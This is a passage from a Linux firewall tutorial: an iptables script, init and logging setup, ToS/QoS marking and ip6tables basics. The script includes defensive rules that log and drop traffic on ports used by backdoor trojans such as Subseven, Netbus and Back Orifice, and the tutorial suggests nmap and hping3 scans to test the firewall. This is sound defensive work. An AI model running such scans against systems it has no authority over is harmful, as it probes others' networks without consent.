if [ $ALLOW_NFS_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # http
fi
#
# Allow POP3
#
if [ $ALLOW_POP3_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 110 -j ACCEPT # POP-3
fi
#
# Allow SMTP
#
if [ $ALLOW_SMTP_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 25 -j ACCEPT # smtp
fi
#
# Allow SSH
#
if [ $ALLOW_SSH_IN -eq 1 ]
then
# Allow three port 22 connections from any given IP address within a
# 60 second period, and requires 60 seconds of no subsequent connection
# attempts before it will resume allowing connections again.
#
# The --rttl option also takes into account the TTL of the datagram
# when matching packets, so as to endeavour to mitigate against spoofed
# source addresses.
#
# Does not not stop any established SSH connections from the host that has made too many SSH connections in a short period of time, and allows for whitelisting.
# Linux kernel will maintain a list of portscan IPs which can be accessed at the location /proc/net/ipt_recent/SSH.
#
#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --set --name SSH
##$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -j WHITELIST_SSH
#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "fp=SSH:Brute a=DROP "
#$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT
fi
#
if [ $ALLOW_SQUID_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 3128 -j ACCEPT # SQUID proxy
fi
#
if [ $ALLOW_TELNET_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 23 -j ACCEPT # telnet
fi
#
if [ $ALLOW_XWINDOWS_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 6000:6009 -j ACCEPT # telnet
fi
#
if [ $ALLOW_XWINDOWS_FONTSERVER_IN -eq 1 ]
then
$IPTABLES -A TCP_IN -p tcp -m conntrack --ctstate NEW --dport 7100 -j ACCEPT # telnet
fi
#
#
#------------------------------------------
# Separate logging of special portscans/connection attempts
#
# Port Scanners
#
if [ $DO_LOG_SCANS -eq 1 ]
then
$IPTABLES -A TCP_IN -i $INET_IFACE -j SCANS
fi
#
#
#------------------------------------------
# *only accept traffic for TCP port # 8080 from mac 00:0F:EA:91:04:07 * ##
# iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT
#
#
#------------------------------------------
# Allow unpriviledged ports
#
##$IPTABLES -A TCP_IN -p tcp -m tcp --dport $PORTS_UNPRIV -m state --state RELATED -j ACCEPT
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A TCP_IN -p tcp -j RETURN
#
#
#*********************************************************
# Create a chain to filter outgoing TCP packets
# Applied to OUTPUT on the external or Internet interface.
#
#
#------------------------------------------
# Ident - Silently reject Ident
# Dont DROP ident, because of possible delays when establishing an outbound connection
#
#$IPTABLES -A TCP_OUT -p tcp -o $INET_IFACE --sport 113 -j REJECT --reject-with tcp-reset
$IPTABLES -A TCP_OUT -p tcp -o $INET_IFACE --sport 113 -j REJECT --reject-with icmp-port-unreachable
#
#
#------------------------------------------
# Public services running ON Server
#
# Allow printing using CUPS
#
if [ $ALLOW_CUPS_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 631 -j ACCEPT # Printing CUPS
fi
#
# Allow DNS
#
if [ $ALLOW_DNS_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 53 -j ACCEPT # DNS
fi
#
# Allow FTP
#
if [ $ALLOW_FTP_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 20 -j ACCEPT # ftp-data
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 21 -j ACCEPT # ftp
fi
#
# Allow HTTP
#
if [ $ALLOW_HTTP_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 80 -j ACCEPT # http
fi
#
# Allow HTTPS
#
if [ $ALLOW_HTTPS_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 443 -j ACCEPT # https
fi
#
# Allow IMAP
#
if [ $ALLOW_IMAP_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 143 -j ACCEPT # imap
fi
#
# Allow MySQL
#
if [ $ALLOW_MYSQL_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 3306 -j ACCEPT # MySQL
fi
#
# Allow NFS
#
if [ $ALLOW_NFS_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 2049 -j ACCEPT # NFS
fi
#
# Allow POP3
#
if [ $ALLOW_POP3_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 110 -j ACCEPT #POP-3
fi
#
# Allow SMTP
#
if [ $ALLOW_SMTP_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 25 -j ACCEPT # smtp
fi
#
# Allow outgoing SMTPS requests. Do NOT allow unencrypted SMTP!
#
if [ $ALLOW_SMTPS_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 465 -j ACCEPT #smtps
fi
#
# Allow SSH
#
if [ $ALLOW_SSH_OUT -eq 1 ]
then
# Allow three port 22 connections from any given IP address within a
# 60 second period, and requires 60 seconds of no subsequent connection
# attempts before it will resume allowing connections again.
#
# The --rttl option also takes into account the TTL of the datagram
# when matching packets, so as to endeavour to mitigate against spoofed
# source addresses.
#
# Does not not stop any established SSH connections from the host
# that has made too many SSH connections in a short period of time,
# and allows for whitelisting.
#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --set --name SSH
##$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -j WHITELIST_SSH
#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j LOG --log-prefix "fp=SSH:OUT:Brute a=DROP "
#$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -m recent --update --seconds 60 --hitcount 4 --rttl --name SSH -j DROP
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 22 -j ACCEPT
fi
#
# Allow Squid
#
if [ $ALLOW_SQUID_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 3128 -j ACCEPT # SQUID proxy
fi
#
# Allow Telnet
#
if [ $ALLOW_TELNET_OUT -eq 1 ]
then
$IPTABLES -A TCP_OUT -p tcp -m conntrack --ctstate NEW --dport 23 -j ACCEPT # telnet
fi
#
#
#------------------------------------------
# Allow unpriviledged ports
#
##$IPTABLES -A TCP_OUT -p tcp -m tcp -o $INET_IFACE -s $INET_IP --sport $PORTS_UNPRIV -j ACCEPT
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A TCP_OUT -p tcp -j RETURN
#
#
#*********************************************************
# Create a chain to filter known SCANS
# Applied to INPUT on the external or Internet interface.
#
# Trojan portscan, special services, etc
#
#
if [ $DO_LOG_SCANS -eq 1 ]
then
#------------------------------------------
# Deepthroat scan
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 6670 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Deepthroat a=DROP "
$IPTABLES -A SCANS -p tcp --dport 6670 -j DROP
#
#
#------------------------------------------
# Subseven scan
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 1243 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:1 a=DROP "
$IPTABLES -A SCANS -p tcp --dport 1243 -j DROP
#
$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 1243 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:2 a=DROP "
$IPTABLES -A SCANS -p udp --dport 1243 -j DROP
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 27374 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:3 a=DROP "
$IPTABLES -A SCANS -p tcp --dport 27374 -j DROP
$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 27374 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:4 a=DROP "
$IPTABLES -A SCANS -p udp --dport 27374 -j DROP
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 6711:6713 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Subseven:5 a=DROP "
$IPTABLES -A SCANS -p tcp --dport 6711:6713 -j DROP
#
#
#------------------------------------------
# Netbus scan
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 12345:12346 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Netbus:1 a=DROP "
$IPTABLES -A SCANS -p tcp --dport 12345:12346 -j DROP
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport 20034 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Netbus:2 a=DROP "
$IPTABLES -A SCANS -p tcp --dport 20034 -j DROP
#
#
#------------------------------------------
# Back Oriface scan
#
$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 31337:31338 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Back-Orifice a=DROP "
$IPTABLES -A SCANS -p udp --dport 31337:31338 -j DROP
#
#
#------------------------------------------
# X-Win scan
#
$IPTABLES -A SCANS -i $INET_IFACE -p tcp --dport $PORTS_XWIN -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=X-Win a=DROP "
$IPTABLES -A SCANS -p tcp --dport $PORTS_XWIN -j DROP
#
#
#------------------------------------------
# Hack'a'Tack 2000
#
$IPTABLES -A SCANS -i $INET_IFACE -p udp --dport 28431 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=Hack'a'Tack-2000 a=DROP "
$IPTABLES -A SCANS -p udp --dport 28431 -j DROP
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A SCANS -j RETURN
#
#
fi
#
#
#*********************************************************
# Create a chain to filter packets that are not to be logged.
# Applied to INPUT on the external or Internet interface.
#
#
#------------------------------------------
# Drop SMB, CIFS, and related Windows traffic without logging.
# TODO: I think not all of these use TCP _and_ UDP. Tighten the rules!
#
if [ $BLOCK_SAMBA_WITHOUT_LOGGING -eq 1 ]
then
$IPTABLES -A NO_LOGGING -p tcp -m multiport --sports 135,137,138,139,445,1433,1434 -j DROP
$IPTABLES -A NO_LOGGING -p udp -m multiport --sports 135,137,138,139,445,1433,1434 -j DROP
#
$IPTABLES -A NO_LOGGING -p tcp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP
$IPTABLES -A NO_LOGGING -p udp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP
fi
#
#
#------------------------------------------
# All good, so return
#
$IPTABLES -A NO_LOGGING -j RETURN
#
#
#*********************************************************
#
# INPUT CHAIN
#
# Add comments to your rules:
# -m comment --comment "Comments help to read output of iptables -nvL"
#
# Allow incoming for loopback interfaces
# Allow traffic on loopback interface (lo0)
#
$IPTABLES -A INPUT -i $LO_IFACE -j ACCEPT
#
#
# Drop all traffic to 127/8 that doesn't use lo0
# Should be already be catched by kernel/rp_filter
#
$IPTABLES -A INPUT -i !$LO_IFACE -d 127.0.0.0/8 -j REJECT
#
#
# Drop invalid packets
#
$IPTABLES -A INPUT -j BAD_PACKETS
#
#
# Always allow certain packets
#
if [ $DO_WHITELISTING -eq 1 ]
then
$IPTABLES -A INPUT -j WHITELIST
fi
#
#
# Allow previously initiated connections to bypass rules
#
$IPTABLES -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
#$IPTABLES -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
#
#
# Drop packets from private address ranges coming in on the external
#
$IPTABLES -A INPUT -j PRIVATE_PACKETS
#
#
# Drop enemies
#
$IPTABLES -A INPUT -j BLACKLIST
#
#
# Allow packets not coming from the outside
#
#$IPTABLES -A INPUT -m conntrack --ctstate NEW -i $LOCAL_IFACE -j ACCEPT
#
#
# Route the rest to the appropriate user chain
#
$IPTABLES -A INPUT -p tcp -i $INET_IFACE -j TCP_IN
$IPTABLES -A INPUT -p udp -i $INET_IFACE -j UDP_IN
$IPTABLES -A INPUT -p icmp -i $INET_IFACE -j ICMP_IN
#
#
# Drop without logging broadcasts that get this far.
# Cuts down on log clutter.
# Comment this line if testing new rules that impact
# broadcast protocols.
#
$IPTABLES -A INPUT -m pkttype --pkt-type broadcast -j DROP
#
#
# Do not log certain packets, as too much logging
#
$IPTABLES -A INPUT -j NO_LOGGING
#
#
# Catch all
# Log packets that still don't match, and then DROP them.
#
$IPTABLES -A INPUT -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=INPUT:999 a=DROP "
$IPTABLES -A INPUT -j DROP
#
#
#*********************************************************
#
# OUTPUT CHAIN
#
#
# Allow outgoing for loopback interfaces
# Allow traffic on loopback interface (lo0)
#
$IPTABLES -A OUTPUT -o $LO_IFACE -j ACCEPT
#
#
# Drop all traffic to 127/8 that doesn't use lo0
# Should be already be catched by kernel/rp_filter
#
$IPTABLES -A OUTPUT -o !$LO_IFACE -d 127.0.0.0/8 -j REJECT
#
#
# Drop invalid packets
#
# Note: Be careful if you're using kernels older than 2.4.29. Some locally
# generated ICMP error types (going through OUTPUT) are erroneously tagged
# as INVALID (instead of RELATED).
# Details: http://lists.debian.org/debian-firewall/2006/05/msg00051.html.
#
$IPTABLES -A OUTPUT -j BAD_PACKETS
#
#
# Allow previously initiated connections to bypass rules
#
$IPTABLES -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
#
#
# Allow established connections, and those not coming from the outside
#
#$IPTABLES -A OUTPUT -m conntrack --ctstate NEW -i $LOCAL_IFACE -j ACCEPT
#
#
# Route the rest to the appropriate user chain
#
$IPTABLES -A OUTPUT -p tcp -o $INET_IFACE -j TCP_OUT
$IPTABLES -A OUTPUT -p udp -o $INET_IFACE -j UDP_OUT
$IPTABLES -A OUTPUT -p icmp -o $INET_IFACE -j ICMP_OUT
#
#
# Catch all
# Log packets that still don't match, and then DROP them.
#
$IPTABLES -A OUTPUT -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=OUTPUT:999 a=DROP "
$IPTABLES -A OUTPUT -j DROP
#
#
#*********************************************************
#
# FORWARD CHAIN
#
#
$IPTABLES -A FORWARD -j BAD_PACKETS
#
#
# Allows new forwarded packets
#
#$IPTABLES -A FORWARD -i $INET_IFACE -o $LOCAL_IFACE -s $LOCAL_NET -m conntrack --ctstate NEW -j ACCEPT
#
# Don't forward from the outside to the inside.
$IPTABLES -A FORWARD -i $INET_IFACE -o $INET_IFACE -j REJECT
#
#
# Drop invalid packets
#
$IPTABLES -A FORWARD -j BAD_PACKETS
#
#
# Always allow certain packets
#
if [ $DO_WHITELISTING -eq 1 ]
then
$IPTABLES -A FORWARD -j WHITELIST
fi
#
#
# Allow previously initiated connections to bypass rules
#
$IPTABLES -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
#
# Allow established connections, and those not coming from the outside
#$IPTABLES -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -i $LOCAL_IFACE -o $INET_IFACE -j ACCEPT
#
#
# Drop enemies
#
$IPTABLES -A FORWARD -j BLACKLIST
#
#
# Allow outgoing connections from the LAN side
# Route packets to either TCP or UDP as appropriate
#
$IPTABLES -A FORWARD -i $LOCAL_IFACE -o $INET_IFACE -p tcp -j TCP_OUT
$IPTABLES -A FORWARD -i $LOCAL_IFACE -o $INET_IFACE -p udp -j UDP_OUT
#
#
# Do not log certain packets, as too much logging
#
$IPTABLES -A FORWARD -j NO_LOGGING
#
#
# Catch all
# Log packets that still don't match, and then DROP them.
#
$IPTABLES -A FORWARD -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=FORWARD:999 a=DROP "
$IPTABLES -A FORWARD -j DROP
#
#
#*********************************************************
#
# POSTROUTING CHAIN
#
#
#------------------------------------------
# Masquerade - Set up your gateway
#
if [ $DO_MASQUERADE -eq 1 ]
then
$IPTABLES -A POSTROUTING -t nat -o $INET_IFACE -j MASQUERADE
else
# POSTROUTING statements for 1:1 NAT
# (Connections originating from the home network servers)
#
# SNAT is used to NAT all other outbound connections initiated
# from the protected network to appear to come from the local
# IP address.
#
# The reason for choosing MASQUERADE in the previous example
# anyway has the following reason: For SNAT one has to specify
# the new source-IP explicitly.
#
# For routers with a static IP address SNAT is the best choice
# because it is faster than MASQUERADE which has to check the
# current IP address of the outgoing network interface at every
# packet. Since SNAT is only meaningful for packets leaving the
# router it is used within the POSTROUTING chain only.
#
#$IPTABLES -A POSTROUTING -t nat -o $INET_IFACE -j SNAT --to-source $INET_IP
$IPTABLES -A POSTROUTING -t nat -s $LOCAL_IP -o $INET_IFACE -j SNAT --to-source $LOCAL_IP
# POSTROUTING statements for Many:1 NAT
#$IPTABLES -A POSTROUTING -t nat -s $LOCAL_NET -o $INET_IFACE -j SNAT --to-source $LOCAL_IP
fi
#
#
#*********************************************************
#
# PREROUTING CHAIN
#
#
if [ $DO_MASQUERADE -eq 0 ]
then
# PREROUTING statements for 1:1 NAT
#
#$IPTABLES -A PREROUTING -t nat -i $INET_IFACE -j DNAT --to-destination $INET_IP
$IPTABLES -A PREROUTING -t nat -d $LOCAL_IP -i $INET_IFACE -j DNAT --to-destination $INET_IP
fi
#
#
#------------------------------------------
# Blocks oversized unfragmented ICMP packets.
#
if [ $BLOCK_OVERSIZE_ICMP_PACKETS -eq 1 ]
then
$IPTABLES -A PREROUTING -t raw -p icmp -m length --length 1492:65535 -m limit --limit $LIMIT_LOG --limit-burst $LIMIT_LOG_BURST -j LOG --log-level $LOG_LEVEL --log-prefix "fp=PRE:oversize_ICMP a=DROP "
$IPTABLES -A PREROUTING -t raw -p icmp -m length --length 1492:65535 -j DROP
fi
#
#
To allow updates to work, HTTP and DNS out should be allowed.
Make the firewall script executable
Issue the following command:
sudo chmod +x /sharewiz/firewall/firewall.sh
Create the firewall start / stop script
Issue the following command:
sudo vi /etc/init.d/firewall-sharewiz
…add the following content to the file:
#!/bin/bash
#
# Start and stop the Firewall.
# Modify the following settings as required:
IPTABLES=/sbin/iptables
# Required-Start: $network
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
### END INIT INFO
opts="start stop restart"
#if [[ $1 == start ]] ; then
case "$1" in
start)
/sharewiz/firewall/firewall.sh
;;
stop)
$IPTABLES --flush
$IPTABLES -t nat --flush
$IPTABLES -F -t mangle
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT
$IPTABLES -t nat -P POSTROUTING ACCEPT
$IPTABLES -t nat -P PREROUTING ACCEPT
$IPTABLES -t nat -P OUTPUT ACCEPT
;;
restart)
$IPTABLES --flush
$IPTABLES -t nat --flush
$IPTABLES -F -t mangle
$IPTABLES -P INPUT ACCEPT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -P FORWARD ACCEPT
$IPTABLES -t nat -P POSTROUTING ACCEPT
$IPTABLES -t nat -P PREROUTING ACCEPT
$IPTABLES -t nat -P OUTPUT ACCEPT
/sharewiz/firewall/firewall.sh
;;
esac
exit 0
Make the firewall script executable
Issue the following command:
sudo chmod +x /etc/init.d/firewall-sharewiz
Install the script to start and stop automatically on system boot and shutdown
Issue the following command:
To have the firewall start before the network comes up use the following command instread:
sudo update-rc.d firewall-sharewiz start 20 2 3 4 5 . stop 99 0 1 6 .
Check if iptables is set to start during boot up
Issue the following command:
sudo chkconfig --list firewall-sharewiz
Check firewall status
Issue the following command:
sudo iptables -L INPUT -n
This should display:
Chain INPUT (policy ACCEPT)
target prot opt source destination
The following displays that there are no rules for the iptables INPUT chain.
Test firewall
Test using different testers:
sudo nmap -v -f 192.168.0.11
sudo nmap -v -sX 192.168.0.11
sudo nmap -v -sN 192.168.0.11
sudo hping3 -X 192.168.0.11
Test with the "Shield's Up" http://www.grc.com feature
Log firewall messages to a seperate file
Issue the following command:
sudo vi /etc/rsyslog.d/50-default.conf
and comment out the following lines near the bottom of the file by placing a hash # mark in front:
daemon.*;mail.*;\
news.err;\
*.=debug;*.=info;\
*.=notice;*.=warn |/dev/xconsole
to
#daemon.*;mail.*;\
# news.err;\
# *.=debug;*.=info;\
# *.=notice;*.=warn |/dev/xconsole
There is a bug in the default installation, in that on a server no /dev/xconsole exists.
Therefore this entire section if commented out.
Issue the following command:
sudo vi /etc/rsyslog.d/20-iptables.conf
and add the following lines to the file:
# Log kernel generated iptable log messages to file
:msg,contains,"iptables: " /var/log/iptables.log
# Uncomment the following to stop logging anything that matches the last rule.
# Doing this will stop logging kernel generated iptables log messages to the file
# normally containing kern.* messages (eg, /var/log/kern.log)
& ~
This logs all firewall related messages to /var/log/iptables.log.
Prevent the logfile getting to big.
Issue the following command:
sudo vi /etc/logrotate.d/iptables
and add the following lines to the file:
/var/log/iptables.log
{
rotate 3
daily
missingok
notifempty
delaycompress
compress
postrotate
/usr/sbin/service rsyslog restart > /dev/null
endscript
}
A logrotate job is created to run daily to keep the log file from getting too large.
To view the firewall log file, issue the command:
Restart rsyslog
Issue the following command:
sudo service rsyslog restart
Quality of Service
Introduction
It is possible to set the Type of Service (ToS) using iptables.
TOS can be used to control the bandwidth usage of the network. These allow controlling:
- Speeding up certain types of data
- Slowing down certain types of data
- Controlling the amount of bandwidth for peer-to-peer networking
- Prevent attachments being sent to the network consuming all the bandwidth
Type of Service (TOS) bits
The Type Of Service (TOS) bits are a set of four-bit flags in the IP header. When any one of these bit flags is set, routers may handle the datagram differently than datagrams with no TOS bits set. Each of the four bits has a different purpose and only one of the TOS bits may be set at any time, so combinations are not allowed. The bit flags are called Type of Service bits because they enable the application transmitting the data to tell the network the type of network service it requires.
The classes of network service available are:
- Minimum delay
- Used when the time it takes for a datagram to travel from the source host to destination host (latency) is most important. A network provider might, for example, use both optical fiber and satellite network connections. Data carried across satellite connections has farther to travel and their latency is generally therefore higher than for terrestrial-based network connections between the same endpoints. A network provider might choose to ensure that datagrams with this type of service set are not carried by satellite.
- Maximum throughput
- Used when the volume of data transmitted in any period of time is important. There are many types of network applications for which latency is not particularly important but the network throughput is; for example, bulk-file transfers. A network provider might choose to route datagrams with this type of service set via high-latency, high-bandwidth routes, such as satellite connections.
- Maximum reliability
- Used when it is important that you have some certainty that the data will arrive at the destination without retransmission being required. The IP protocol may be carried over any number of underlying transmission mediums. While SLIP and PPP are adequate datalink protocols, they are not as reliable as carrying IP over some other network, such as an X.25 network. A network provider might make an alternate network available, offering high reliability, to carry IP that would be used if this type of service is selected.
- Minimum cost
- Used when it is important to minimize the cost of data transmission. Leasing bandwidth on a satellite for a transpacific crossing is generally less costly than leasing space on a fiber-optical cable over the same distance, so network providers may choose to provide both and charge differently depending on which you use. In this scenario, your “minimum cost” type of service bit may cause your datagrams to be routed via the lower-cost satellite route.
A lot of routers on the Internet do not handle TOS settings very well, therefore it may prove to be a bit useless to attempt TOS mangling before sending the packets on to the Internet.
At best the routers will not pay any attention to the TOS field. At worst, they will look at the TOS field and do the wrong thing.
However, the TOS field can most definitely be put to good use if you have a large WAN or LAN with multiple routers. Packets can be given different routes and preferences, based on their TOS value - even though this might be confined to your own network.
Setting the TOS
TOS changes are specified using two-bit masks. The first of these bit masks is logically ANDed with the IP options field of the datagram and the second is logically eXclusive-ORd with it.
Example usage:
iptables -t mangle -A PREROUTING -p tcp --dport 22 -j TOS --set-tos 0x10
The --set-tos option tells the TOS mangler what TOS value to set on packets that are matched. The option takes a numeric value, either in hex or in decimal value.
The example states that SSH packets should ideally use Minimum Delay.
Suggested uses for the TOS bitmasks:
| TOS | AND mask | XOR mask | Suggested Use |
|---|---|---|---|
| Minimum Delay | 0x01 | 0x10 | ftp, telnet, ssh |
| Maximum Throughput | 0x01 | 0x08 | ftp-data, www |
| Maximum Reliability | 0x01 | 0x04 | snmp, dns |
| Minimum Cost | 0x01 | 0x02 | nntp, smtp |
| Normal Service | 0x01 | 0x00 | other services |
These predefined TOS values can be found in the kernel include files, or more precisely, the Linux/ip.h file.
For further information issue the following command:
Good example:
The rules aim to carry out a crude method of traffic shaping, basically giving priority to traffic that needs a response immediately, allowing file sharing apps such as Azureus to continue in the background unnoticed.
# Assign priority to web, email, and ftp traffic.
iptables -A PREROUTING -t mangle -p tcp --sport http -j TOS --set-tos Minimize-Delay
iptables -A PREROUTING -t mangle -p tcp -m multiport --sports smtp,pop3 -j TOS --set-tos Minimize-Cost
iptables -A PREROUTING -t mangle -p tcp --sport ftp -j TOS --set-tos Minimize-Delay
iptables -A PREROUTING -t mangle -p tcp --sport ftp-data -j TOS --set-tos Maximize-Throughput
iptables -A OUTPUT -t mangle -p tcp --dport http -j TOS --set-tos Minimize-Delay
iptables -A OUTPUT -t mangle -p tcp -m multiport --dports smtp,pop3 -j TOS --set-tos Minimize-Cost
iptables -A OUTPUT -t mangle -p tcp --dport ftp -j TOS --set-tos Minimize-Delay
iptables -A OUTPUT -t mangle -p tcp --dport ftp-data -j TOS --set-tos Maximize-Throughput
Quality of Service
You can start marking packets adding rules to the PREROUTING chain in the mangle table.
Issue the following command:
iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark 0x1
iptables -t mangle -A PREROUTING -p icmp -j RETURN
A -j RETURN is used so that packets do not traverse all the rules. icmp packets won't match other rules below RETURN. Keep that in mind.
Now you should be able to see packet count increasing when pinging from machines within the private network to some site on the Internet. Check packet count increasing in 1:10
tc -s class show dev eth0
Now we can start adding more rules, lets do proper TOS handling:
iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j MARK --set-mark 0x1
iptables -t mangle -A PREROUTING -m tos --tos Minimize-Delay -j RETURN
iptables -t mangle -A PREROUTING -m tos --tos Minimize-Cost -j MARK --set-mark 0x5
iptables -t mangle -A PREROUTING -m tos --tos Minimize-Cost -j RETURN
iptables -t mangle -A PREROUTING -m tos --tos Maximize-Throughput -j MARK --set-mark 0x6
iptables -t mangle -A PREROUTING -m tos --tos Maximize-Throughput -j RETURN
Now prioritize ssh packets:
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j MARK --set-mark 0x1
iptables -t mangle -A PREROUTING -p tcp -m tcp --sport 22 -j RETURN
A good idea is to prioritize packets to begin tcp connections, those with SYN flag set:
iptables -t mangle -I PREROUTING -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -j MARK --set-mark 0x1
iptables -t mangle -I PREROUTING -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -j RETURN
and so on.
When we are done adding rules to PREROUTING in mangle, we terminate the PREROUTING table with:
iptables -t mangle -A PREROUTING -j MARK --set-mark 0x6
So previously unmarked traffic goes in 1:15.
This last step is unnecessary since default class was 1:15, but I will mark them in order to be consistent with the whole setup, and furthermore it's useful to see the counter in that rule.
It will be a good idea to do the same in the OUTPUT rule, so repeat those commands with -A OUTPUT instead of PREROUTING. ( s/PREROUTING/OUTPUT/ ). Then traffic generated locally (on the Linux router) will also be classified. I finish OUTPUT chain with -j MARK --set-mark 0x3 so local traffic has higher priority.
IP6 Firewall Security
Summary
To configure and manage IPv6 rulesets, you need to use ip6tables(8) which is provided by the default Debian install, in the package iptables.
http://manpages.debian.net/man/8/ip6tables
ip6tables -A INPUT -i lo -j ACCEPT
ip6tables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
ip6tables -A INPUT -p tcp -j REJECT --reject-with tcp-reset
ip6tables -A INPUT -j REJECT
It allows everything on the internal local interface.
It allows any packet that is an answer for a packet you send out. This includes packets within an TCP connection, answers to UDP packets such as small DNS queries. For the old style unencrypted FTP protocol, this includes the data connection, assuming the ip_conntrack_ftp module is loaded.
Reject all tries to open a tcp connection from the outside.
Reject all initial (non answer) udp packets.
Alternatively you can use -j DROP in the last two rules. For a discussion on this topic see Reject IP packets with an ICMP error, or just drop them?
ARP Firewall Security
Introduction
